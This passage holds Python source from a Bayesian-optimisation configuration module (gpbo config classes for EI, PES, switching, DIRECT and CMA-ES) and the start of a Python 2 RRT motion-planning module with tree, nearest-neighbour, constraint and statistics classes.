'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpmaprecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'smode':'direct',
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
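# --- Illustrative usage (not part of the original module) ---------------------
# Minimal sketch of building one of the configuration objects above for a toy
# objective. The objective's (x, ev) signature and its return value are
# assumptions for illustration; the optimizer that consumes these configs is
# not shown here.
def _example_eimle_config():
    def toy_objective(x, ev):
        y = float(sum(xi ** 2 for xi in x))  # quadratic bowl on [-1, 1]^D
        return y, 1.0, dict()
    return eimledefault(toy_objective, D=2, n=25, s=1e-6,
                        path='results', fname='eimle_demo.csv')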
import copy
class eifixdefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIFIXaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'hyper': sp.array([1.]+[0.5]*D),
'kindex': GPdc.MAT52,
'maxf':500+100*D,
'overhead':None,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 2000,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpfixrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'hyper':self.aqpara['hyper'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'smode':'direct',
'dpara':copy.deepcopy(self.aqpara['dpara']),
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eimlelearns():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIMAPaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'mprior': sp.array([1.]+[0.]*D+[-2]),
'sprior': sp.array([1.]*(D+1)+[5]),
'kindex': GPdc.SQUEXPCS,
'maxf':500+100*D,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpmaprecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eihypdefault(object):
def __init__(self,f,D,n,s,path,fname,nrandinit=10,kindex=GPdc.MAT52):
self.aqfn = gpbo.core.acquisitions.eihypaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': nrandinit,
#'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'kindex': kindex,
'DH_SAMPLES': 16+6*D,
'drop':True,
'noS': False,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':1000+200*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eihypgamma(eihypdefault):
def __init__(self,*args,**kwargs):
super(eihypgamma,self).__init__(*args,**kwargs)
D = len(self.aqpara['lb'])
self.reccpara['kindex']=self.aqpara['kindex']= GPdc.MAT52
self.reccpara['mprior']=self.aqpara['mprior']= sp.array([2.]+[3.]*D)
self.reccpara['sprior']=self.aqpara['sprior']= sp.array([0.5]+[0.15]*D)
self.reccpara['priorshape']=self.aqpara['priorshape']='gamma'
class pesfsdefault(object):
def __init__(self,f,D,n,s,path,fname,ninit=10):
self.aqfn = gpbo.core.acquisitions.PESfsaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': ninit,
#'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'priorshape' : 'lognorm',
'kindex': GPdc.MAT52,
'DH_SAMPLES': 16+6*D,
'weighted' : 0,
'DM_SAMPLES': 20+8*D,
'DM_SUPPORT': 750+250*D,
'SUPPORT_MODE': [gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA': 12+4.*D,
'drop':True,
'overhead':'none',
'noS': False,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class pesfsgamma(pesfsdefault):
def __init__(self,*args,**kwargs):
super(pesfsgamma,self).__init__(*args,**kwargs)
D = len(self.aqpara['lb'])
self.reccpara['kindex']=self.aqpara['kindex']= gpbo.core.GPdc.MAT52
self.reccpara['mprior']=self.aqpara['mprior']= sp.array([2.]+[3.]*D)
self.reccpara['sprior']=self.aqpara['sprior']= sp.array([0.5]+[0.15]*D)
self.reccpara['priorshape']=self.aqpara['priorshape']='gamma'
class pesfspredictive(pesfsdefault):
def __init__(self,*args,**kwargs):
super(pesfspredictive,self).__init__(*args,**kwargs)
D = len(self.aqpara['lb'])
self.reccpara['kindex']=self.aqpara['kindex']= GPdc.MAT52
self.reccpara['mprior']=self.aqpara['mprior']= sp.array([2.]+[3.]*D)
self.reccpara['sprior']=self.aqpara['sprior']= sp.array([0.5]+[0.15]*D)
self.reccpara['priorshape']=self.aqpara['priorshape']='gamma'
self.aqpara['weighted']=2
class pesvsdefault():
def __init__(self,f,cfn,D,n,lsl,lsu,path,fname):
self.aqfn = gpbo.core.acquisitions.PESvsaq
self.aqpara= {
'ev': {'s': lsu, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'maxf': 500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'kindex': GPdc.MAT52,
'DH_SAMPLES': 16+6*D,
'DM_SAMPLES': 20+8*D,
'DM_SUPPORT': 750+250*D,
'SUPPORT_MODE': [gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA': 12+4*D,
'noS': False,
'logsu': lsu,
'logsl': lsl,
'sinitrand':True,
'overhead':'None',
'cfn': cfn,
'traincfn':'llog1d',
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class pesbsdefault():
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.PESbsaq
self.aqpara = {
'ev':{'s':s,'d':[sp.NaN],'xa':0.},
'lb':[-1.] * D,
'ub':[ 1.] * D,
'maxf':500+250*(D+1),
'mprior': sp.array([1.]+[0.]*(D+1)),
'sprior': sp.array([1.]*(D+2)),
'kindex':GPdc.MAT52,
'DH_SAMPLES':16+6*D,
'DM_SAMPLES':20+8*D,
'hyp_chains':1,
'DM_SUPPORT':750+250*D,
'SUPPORT_MODE':[gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA':12+4*D,
'noS':False,
'nrandinit':20,
'cfn':lambda x,ev:42.,
'traincfn':True,
'xau':1.,
'xal':0.,
'startmode':'inline',
'overhead':'last',
'initpoints':[0.5,0.75,0.875],
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinasrecc
self.reccpara = {
'ev': self.aqpara['ev'],
'lb': self.aqpara['lb'],
'ub': self.aqpara['ub'],
'mprior': self.aqpara['mprior'],
'sprior': self.aqpara['sprior'],
'kindex': self.aqpara['kindex'],
'maxf': 500+100*D, #10**(-min(12,max(6.,3*D))),
'onlyafter': self.aqpara['nrandinit'],
'check': True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn': 1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class pesbslearns():
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.PESbsaq
self.aqpara = {
'ev':{'s':s,'d':[sp.NaN],'xa':0.},
'lb':[-1.] * D,
'ub':[ 1.] * D,
'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*(D+1)+[-3]),
'sprior': sp.array([1.]*(D+2)+[3]),
'kindex':GPdc.MAT52CS,
'DH_SAMPLES':16,
'DM_SAMPLES':32,
'DM_SUPPORT':1000,
'SUPPORT_MODE':[gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA':16.,
'noS':False,
'nrandinit':20,
'cfn':lambda x,ev:42.,
'traincfn':True,
'xau':1.,
'xal':0.,
'startmode':'inline',
'initpoints':[0.5,0.75,0.875],
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinasrecc
self.reccpara = {
'ev': self.aqpara['ev'],
'lb': self.aqpara['lb'],
'ub': self.aqpara['ub'],
'mprior': self.aqpara['mprior'],
'sprior': self.aqpara['sprior'],
'kindex': self.aqpara['kindex'],
'maxf': 500+100*D,
'onlyafter': self.aqpara['nrandinit'],
'check': True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn': 1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class switchdefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self, f, D, ninit,nstop, s, path, fname):
#the first acquisition function is standard PES
C = gpbo.core.config.pesfspredictive(f, D, 10, s, 'results', 'introspection.csv',ninit=ninit)
aq0 = C.aqfn
aq0para = C.aqpara
#the second acquisition is local exploitation with BFGS
aq1 = gpbo.core.acquisitions.splocalaq
aq1para = {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.] * D,
'ub': [1.] * D,
'start': [0.] * D
}
#finally the third acquisition is EI using sampled hyperparameters, which will be passed a modified incumbent value to use at each step
C2 = gpbo.core.config.eihypdefault(f, D, ninit, s, 'results', 'introspection.csv')
aq2 = C2.aqfn
aq2para = C2.aqpara
aq2para['priorshape']=aq0para['priorshape']
aq2para['mprior']= aq0para['mprior']
aq2para['sprior']= aq0para['sprior']
aq2para['kindex']= aq0para['kindex']
        #the chooser will select which acquisition is used at each step
self.chooser = gpbo.core.choosers.globallocalregret
self.choosepara = {
'ev': aq0para['ev'],
'lb': aq0para['lb'],
'ub': aq0para['ub'],
'mprior': aq0para['mprior'],
'sprior': aq0para['sprior'],
'kindex': aq0para['kindex'],
'priorshape': aq0para['priorshape'],
'nhyp' : aq0para['DH_SAMPLES'],
'onlyafter': aq0para['nrandinit'],
'weighted': aq0para['weighted'],
'check': True,
'everyn': 1,
'support': 1500,
'draws': 10000,
'regretswitch':1e-4,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 2000,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 400},
'pvetol':1e-2,
'lineSh':1e-4,
'rotate':True,
'nlineS':30+10*D
}
self.aqfn = [aq0,aq1,aq2]
self.aqpara = [aq0para,aq1para,aq2para]
self.multimode = True
self.stoppara = {'nmax': nstop}
self.stopfn = gpbo.core.optimize.norlocalstopfn
reccfn0 = C.reccfn
reccpara0 = C.reccpara
reccpara0['smode']='dthenl'
reccfn1 = gpbo.core.reccomenders.argminrecc
reccpara1 = {'check': True}
self.reccfn = [reccfn0,reccfn1,reccfn0]
self.reccpara = [reccpara0,reccpara1,reccpara0]
self.ojfchar = {'dx': len(aq0para['lb']), 'dev': len(aq0para['ev'])}
self.ojf = f
self.path = path
self.fname = fname
return
class directdefault:
def __init__(self, f, D, n, s, path, fname):
self.aqfn = gpbo.core.acquisitions.directaq
self.aqpara = {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.] * D,
'ub': [1.] * D
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.norlocalstopfn
self.reccfn = gpbo.core.reccomenders.argminrecc
self.reccpara = {
'ev': self.aqpara['ev'],
'check': True
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf = f
self.path = path
self.fname = fname
return
class cmaesdefault:
def __init__(self, f, D, n, s, path, fname):
self.aqfn = gpbo.core.acquisitions.cmaesaq
self.aqpara = {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.] * D,
'ub': [1.] * D
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.norlocalstopfn
self.reccfn = gpbo.core.reccomenders.argminrecc
self.reccpara = {
'ev': self.aqpara['ev'],
'check': True
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf = f
self.path = path
self.fname = fname
return
| markm541374/gpbo | gpbo/core/config.py | Python | agpl-3.0 | 19,809 | 0.01575 |
#!/usr/bin/env python
""" This is a draft modification of the RRT algorithm for the sepcial case
that sampling the goal region is computationally expensive """
import random
import numpy
import time
import math
import logging
import copy
from rtree import index
class SampleData:
def __init__(self, config, data=None, data_copy_fn=copy.deepcopy, id_num=-1):
self._config = config
self._id = id_num
self._data = data
self._dataCopyFct = data_copy_fn
def get_configuration(self):
return self._config
def get_data(self):
return self._data
def copy(self):
copied_data = None
if self._data is not None:
copied_data = self._dataCopyFct(self._data)
return SampleData(numpy.copy(self._config), copied_data, data_copy_fn=self._dataCopyFct, id_num=self._id)
def is_valid(self):
return self._config is not None
def is_equal(self, other_sample_data):
return (self._config == other_sample_data._config).all() and self._data == other_sample_data._data
def get_id(self):
return self._id
def __repr__(self):
return self.__str__()
def __str__(self):
return "{SampleData:[Config=" + str(self._config) + "; Data=" + str(self._data) + "]}"
class TreeNode(object):
def __init__(self, nid, pid, data):
self._id = nid
self._parent = pid
self._data = data
self._children = []
def get_sample_data(self):
return self._data
def get_id(self):
return self._id
def get_parent_id(self):
return self._parent
def add_child_id(self, cid):
self._children.append(cid)
def get_children(self):
return self._children
def __str__(self):
return "{TreeNode: [id=" + str(self._id) + ", Data=" + str(self._data) + "]}"
class Tree(object):
TREE_ID = 0
def __init__(self, root_data, b_forward_tree=True):
self._nodes = [TreeNode(0, 0, root_data.copy())]
self._labeled_nodes = []
self._node_id = 1
self._b_forward_tree = b_forward_tree
self._tree_id = Tree.TREE_ID + 1
Tree.TREE_ID += 1
def add(self, parent, child_data):
"""
Adds the given data as a child node of parent.
@param parent: Must be of type TreeNode and denotes the parent node.
@param child_data: SampleData that is supposed to be saved in the child node (it is copied).
"""
child_node = TreeNode(self._node_id, parent.get_id(), child_data.copy())
parent.add_child_id(child_node.get_id())
self._nodes.append(child_node)
# self._parents.append(parent.get_id())
# assert(len(self._parents) == self._node_id + 1)
self._node_id += 1
return child_node
def get_id(self):
return self._tree_id
def add_labeled_node(self, node):
self._labeled_nodes.append(node)
def get_labeled_nodes(self):
return self._labeled_nodes
def clear_labeled_nodes(self):
self._labeled_nodes = []
def remove_labeled_node(self, node):
if node in self._labeled_nodes:
self._labeled_nodes.remove(node)
def nearest_neighbor(self, sample):
pass
def extract_path(self, goal_node):
path = [goal_node.get_sample_data()]
current_node = goal_node
while current_node.get_id() != 0:
current_node = self._nodes[current_node.get_parent_id()]
path.append(current_node.get_sample_data())
path.reverse()
return path
def get_root_node(self):
return self._nodes[0]
def size(self):
return len(self._nodes)
def merge(self, merge_node_a, other_tree, merge_node_b):
"""
Merges this tree with the given tree. The connection is established through nodeA and nodeB,
for which it is assumed that both nodeA and nodeB represent the same configuration.
In other words, both the parent and all children of nodeB become children of nodeA.
Labeled nodes of tree B will be added as labeled nodes of tree A.
Runtime: O(size(otherTree) * num_labeled_nodes(otherTree))
        @param merge_node_a The node of this tree at which to attach otherTree
@param other_tree The other tree (is not changed)
@param merge_node_b The node of tree B that is merged with mergeNodeA from this tree.
@return The root of treeB as a TreeNode of treeA after the merge.
"""
node_stack = [(merge_node_a, merge_node_b, None)]
b_root_node_in_a = None
while len(node_stack) > 0:
(current_node_a, current_node_b, ignore_id) = node_stack.pop()
for child_id in current_node_b.get_children():
if child_id == ignore_id: # prevent adding duplicates
continue
child_node_b = other_tree._nodes[child_id]
child_node_a = self.add(current_node_a, child_node_b.get_sample_data())
if child_node_b in other_tree._labeled_nodes:
self.add_labeled_node(child_node_a)
node_stack.append((child_node_a, child_node_b, current_node_b.get_id()))
# In case current_node_b is not the root of B, we also need to add the parent
# as a child in this tree.
parent_id = current_node_b.get_parent_id()
if current_node_b.get_id() != parent_id:
if parent_id != ignore_id: # prevent adding duplicates
parent_node_b = other_tree._nodes[current_node_b.get_parent_id()]
child_node_a = self.add(current_node_a, parent_node_b.get_sample_data())
node_stack.append((child_node_a, parent_node_b, current_node_b.get_id()))
if parent_node_b in other_tree._labeled_nodes:
self.add_labeled_node(child_node_a)
else: # save the root to return it
b_root_node_in_a = current_node_a
return b_root_node_in_a
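# --- Illustrative usage (not part of the original module) ---------------------
# Small sketch of the Tree API documented above: grow two trees from dummy
# SampleData configurations, merge them at a shared configuration and extract
# the resulting path. Plain numpy arrays stand in for real configurations; no
# sampling or collision checking is involved.
def _demo_tree_merge():
    tree_a = Tree(SampleData(numpy.array([0.0, 0.0])))
    node_a = tree_a.add(tree_a.get_root_node(), SampleData(numpy.array([0.5, 0.0])))
    tree_b = Tree(SampleData(numpy.array([1.0, 1.0])), b_forward_tree=False)
    node_b = tree_b.add(tree_b.get_root_node(), SampleData(numpy.array([0.5, 0.0])))
    # node_a and node_b represent the same configuration, so the trees can be merged.
    root_b_in_a = tree_a.merge(node_a, tree_b, node_b)
    return tree_a.extract_path(root_b_in_a)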
class SqrtTree(Tree):
def __init__(self, root):
super(SqrtTree, self).__init__(root)
        self.offset = 0
        self.stride = 0  # updated by _update_stride() whenever a node is added
def add(self, parent, child):
child_node = super(SqrtTree, self).add(parent, child)
self._update_stride()
return child_node
# def clear(self):
# super(SqrtTree, self).clear()
# self.offset = 0
# self.stride = 0
def nearest_neighbor(self, q):
"""
Computes an approximate nearest neighbor of q.
To keep the computation time low, this method only considers sqrt(n)
nodes, where n = #nodes.
This implementation is essentially a copy from:
http://ompl.kavrakilab.org/NearestNeighborsSqrtApprox_8h_source.html
@return The tree node (Type TreeNode) for which the data point is closest to q.
"""
d = float('inf')
nn = None
if self.stride > 0:
for i in range(0, self.stride):
pos = (i * self.stride + self.offset) % len(self._nodes)
n = self._nodes[pos]
dt = numpy.linalg.norm(q - n.get_sample_data().get_configuration())
if dt < d:
d = dt
nn = n
self.offset = random.randint(0, self.stride)
return nn
def _update_stride(self):
self.stride = int(1 + math.floor(math.sqrt(len(self._nodes))))
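# --- Illustrative usage (not part of the original module) ---------------------
# Sketch of the sqrt(n) approximate nearest-neighbour query described above.
# Only about sqrt(n) nodes are inspected per query, so the returned node is an
# approximation rather than the guaranteed nearest neighbour.
def _demo_sqrt_tree_nn():
    tree = SqrtTree(SampleData(numpy.array([0.0, 0.0])))
    for i in range(1, 20):
        tree.add(tree.get_root_node(), SampleData(numpy.array([i / 20.0, 0.0])))
    return tree.nearest_neighbor(numpy.array([0.3, 0.0]))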
class RTreeTree(Tree):
def __init__(self, root, dimension, scaling_factors, b_forward_tree=True):
super(RTreeTree, self).__init__(root, b_forward_tree=b_forward_tree)
self._scaling_factors = scaling_factors
self._create_index(dimension)
self.dimension = dimension
self._add_to_idx(self._nodes[0])
def add(self, parent, child_data):
child_node = super(RTreeTree, self).add(parent, child_data)
self._add_to_idx(child_node)
return child_node
def nearest_neighbor(self, sample_data):
if len(self._nodes) == 0:
return None
point_list = list(sample_data.get_configuration())
point_list = map(lambda x, y: math.sqrt(x) * y, self._scaling_factors, point_list)
point_list += point_list
nns = list(self.idx.nearest(point_list))
return self._nodes[nns[0]]
def _add_to_idx(self, child_node):
point_list = list(child_node.get_sample_data().get_configuration())
point_list = map(lambda x, y: math.sqrt(x) * y, self._scaling_factors, point_list)
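        # rtree expects an interleaved (min..., max...) bounding box; duplicating the
        # scaled point yields a degenerate box that represents a single point.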
point_list += point_list
self.idx.insert(child_node.get_id(), point_list)
def _create_index(self, dim):
prop = index.Property()
prop.dimension = dim
self.idx = index.Index(properties=prop)
class Constraint(object):
def project(self, old_config, config):
return config
class ConstraintsManager(object):
def __init__(self, callback_function=None):
self._constraints_storage = {}
self._active_constraints = []
self._new_tree_callback = callback_function
def project(self, old_config, config):
if len(self._active_constraints) == 0:
return config
# For now we just iterate over all constraints and project successively
for constraint in self._active_constraints:
config = constraint.project(old_config, config)
return config
def set_active_tree(self, tree):
if tree.get_id() in self._constraints_storage:
self._active_constraints.extend(self._constraints_storage[tree.get_id()])
def reset_constraints(self):
self._active_constraints = []
def clear(self):
self._active_constraints = []
self._constraints_storage = {}
def register_new_tree(self, tree):
if self._new_tree_callback is not None:
self._constraints_storage[tree.get_id()] = self._new_tree_callback(tree)
class PGoalProvider(object):
def compute_p_goal(self, num_trees):
pass
class ConstPGoalProvider(PGoalProvider):
def __init__(self, p_goal):
self._pGoal = p_goal
def compute_p_goal(self, num_trees):
logging.debug('[ConstPGoalProvider::compute_p_goal] Returning constant pGoal')
if num_trees == 0:
return 1.0
return self._pGoal
class DynamicPGoalProvider(PGoalProvider):
def __init__(self, p_max=0.8, goal_w=1.2, p_goal_min=0.01):
self._pMax = p_max
self._goalW = goal_w
self._pGoalMin = p_goal_min
def compute_p_goal(self, num_trees):
logging.debug('[DynamicPGoalProvider::compute_p_goal] Returning dynamic pGoal')
return self._pMax * math.exp(-self._goalW * num_trees) + self._pGoalMin
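# --- Illustrative usage (not part of the original module) ---------------------
# The dynamic goal-sampling probability decays exponentially with the number of
# existing backward trees: p = p_max * exp(-goal_w * num_trees) + p_goal_min.
# With the defaults (p_max=0.8, goal_w=1.2, p_goal_min=0.01) this gives roughly
# 0.81, 0.25, 0.08, 0.03 for 0, 1, 2 and 3 trees.
def _demo_p_goal_schedule():
    provider = DynamicPGoalProvider()
    return [provider.compute_p_goal(k) for k in range(4)]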
class StatsLogger:
def __init__(self):
self.num_backward_trees = 0
self.num_goals_sampled = 0
self.num_valid_goals_sampled = 0
self.num_approx_goals_sampled = 0
self.num_attempted_tree_connects = 0
self.num_successful_tree_connects = 0
self.num_goal_nodes_sampled = 0
self.num_c_free_samples = 0
self.num_accumulated_logs = 1
self.final_grasp_quality = 0.0
self.runtime = 0.0
self.success = 0
self.treeSizes = {}
def clear(self):
self.num_backward_trees = 0
self.num_goals_sampled = 0
self.num_valid_goals_sampled = 0
self.num_approx_goals_sampled = 0
self.num_attempted_tree_connects = 0
self.num_successful_tree_connects = 0
self.num_goal_nodes_sampled = 0
self.num_c_free_samples = 0
self.num_accumulated_logs = 1
self.final_grasp_quality = 0.0
self.runtime = 0.0
self.success = 0
self.treeSizes = {}
def to_dict(self):
a_dict = {'numBackwardTrees': self.num_backward_trees, 'numGoalSampled': self.num_goals_sampled,
'numValidGoalSampled': self.num_valid_goals_sampled,
'numApproxGoalSampled': self.num_approx_goals_sampled,
'numGoalNodesSampled': self.num_goal_nodes_sampled,
'numSuccessfulTreeConnects': self.num_successful_tree_connects,
'numCFreeSamples': self.num_c_free_samples, 'finalGraspQuality': float(self.final_grasp_quality),
'runtime': self.runtime, 'success': self.success}
return a_dict
def print_logs(self):
print 'Logs:'
print ' num_backward_trees(avg): ', self.num_backward_trees
print ' num_goals_sampled(avg): ', self.num_goals_sampled
print ' num_valid_goals_sampled(avg): ', self.num_valid_goals_sampled
print ' num_approx_goals_sampled(avg): ', self.num_approx_goals_sampled
print ' num_goal_nodes_sampled(avg): ', self.num_goal_nodes_sampled
print ' num_attempted_tree_connects(avg): ', self.num_attempted_tree_connects
print ' num_successful_tree_connects(avg): ', self.num_successful_tree_connects
print ' num_c_free_samples(avg): ', self.num_c_free_samples
print ' final_grasp_quality(avg): ', self.final_grasp_quality
print ' runtime(avg): ', self.runtime
print ' success(avg): ', self.success
if self.num_accumulated_logs == 1:
print ' treeSizes: ', self.treeSizes
def accumulate(self, other_logger):
        self.num_backward_trees += other_logger.num_backward_trees
        self.num_goals_sampled += other_logger.num_goals_sampled
        self.num_valid_goals_sampled += other_logger.num_valid_goals_sampled
        self.num_approx_goals_sampled += other_logger.num_approx_goals_sampled
        self.num_attempted_tree_connects += other_logger.num_attempted_tree_connects
        self.num_successful_tree_connects += other_logger.num_successful_tree_connects
        self.num_goal_nodes_sampled += other_logger.num_goal_nodes_sampled
        self.num_c_free_samples += other_logger.num_c_free_samples
        self.num_accumulated_logs += other_logger.num_accumulated_logs
        self.final_grasp_quality += other_logger.final_grasp_quality
self.runtime += other_logger.runtime
self.success += other_logger.success
self.treeSizes.update(other_logger.treeSizes)
def finalize_accumulation(self):
self.num_backward_trees = float(self.num_backward_trees) / float(self.num_accumulated_logs)
self.num_goals_sampled = float(self.num_goals_sampled) / float(self.num_accumulated_logs)
self.num_valid_goals_sampled = float(self.num_valid_goals_sampled) / float(self.num_accumulated_logs)
self.num_approx_goals_sampled = float(self.num_approx_goals_sampled) / float(self.num_accumulated_logs)
self.num_attempted_tree_connects = float(self.num_attempted_tree_connects) / float(self.num_accumulated_logs)
self.num_successful_tree_connects = float(self.num_successful_tree_connects) / float(self.num_accumulated_logs)
self.num_goal_nodes_sampled = float(self.num_goal_nodes_sampled) / float(self.num_accumulated_logs)
self.final_grasp_quality /= float(self.num_accumulated_logs)
self.runtime /= float(self.num_accumulated_logs)
self.success /= float(self.num_accumulated_logs)
self.num_c_free_samples = float(self.num_c_free_samples) / float(self.num_accumulated_logs)
class RRT:
def __init__(self, p_goal_provider, c_free_sampler, goal_sampler, logger, pgoal_tree=0.8,
constraints_manager=None): # pForwardTree, pConnectTree
""" Initializes the RRT planner
        @param p_goal_provider - Instance of PGoalProvider that provides the probability of sampling a new goal
@param c_free_sampler - A sampler of c_free.
@param goal_sampler - A sampler of the goal region.
@param logger - A logger (of type Logger) for printouts.
@param constraints_manager - (optional) a constraint manager.
"""
self.p_goal_provider = p_goal_provider
self.p_goal_tree = pgoal_tree
self.goal_sampler = goal_sampler
self.c_free_sampler = c_free_sampler
self.logger = logger
self.stats_logger = StatsLogger()
# self.debugConfigList = []
if constraints_manager is None:
constraints_manager = ConstraintsManager()
self._constraints_manager = constraints_manager
